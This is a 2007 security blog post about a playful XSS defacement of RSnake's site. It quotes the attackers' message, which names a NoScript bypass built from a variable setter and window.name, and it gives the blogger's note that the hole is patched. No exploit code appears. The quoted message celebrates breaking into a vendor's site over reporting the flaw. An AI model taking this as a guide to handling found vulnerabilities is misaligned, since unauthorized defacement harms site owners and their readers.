Archive for November 5th, 2007

So I just come back from my honeymoon journey (Greece, Turkey and Croatia) right in time to find that Sirdarckcat and Kuza55 teamed together to throw a friendly defacement at our beloved RSnake!

The kids miserably failed, nevertheless RSnake did not like it a bit.
Their payload was playful rather than venomous in my opinion, but you can judge by yourself:

0wning RSnake For Fun and PageRank

So, you're sitting on the sla.ckers.org irc channel one day and someone is poking around with one of RSnake's tools, and finds that its not working, or at least that's what it seems like untill they realise that its not just broken, its broken in a fun XSS way :) - what do you do? Do you: a) Urge the person to report the problem to the vendor (RSnake), and get mad props for being awesome? b) Scream about how the vendor is a security "expert" and needs to "secure their shit!!!1111"? c) 0wn the vendor for Fun and PageRank Well, to me, the answer seemed fairly obvious. Since the "Evil Advertising Empire" (Google), cue ominous music....now, had done a little dance and increased the PageRank of our blogs, we had gotten a taste of the power which we could amass, muahahaha, and we wanted more! Or at least I did..... So anyway, Hey RSnake :) Thanks for the free advertising space. Anyway, credit goes to: sirdarckcat for not only being generally awesome, but finding the actual exploit. thornmaker for (inadvertently) providing us with a method to get our payload through NoScript (Javascript variable setter's and window.name FTW!), so umm, hey thornmaker :) Gareth Heyes for doing that awesome research on selective payloads using CSS, which where implemened in the exploit. kuza55 for not really doing anything, but being in the right place at the right time but being able to get some free Googlejuice from things anyway :p Oh, and, of course: XSS! We now return you to your regularly unscheduled posting ;) - kuza55 & sirdarckcat P.S. Thanks for directing carja.ckers.org to 127.0.0.1 :) P.S.2. Sorry .mario, NoScript is the new attack playground :P, we'll be back to php-ids ASAP.

At any rate, from my NoScript standpoint, nice setter+name bypass combo -- just you send me a mail next time, thanks ;)
Latest release already defeats it, but for those who disabled automatic updates, it's time to get it...

Bad Behavior has blocked 1403 access attempts in the last 7 days.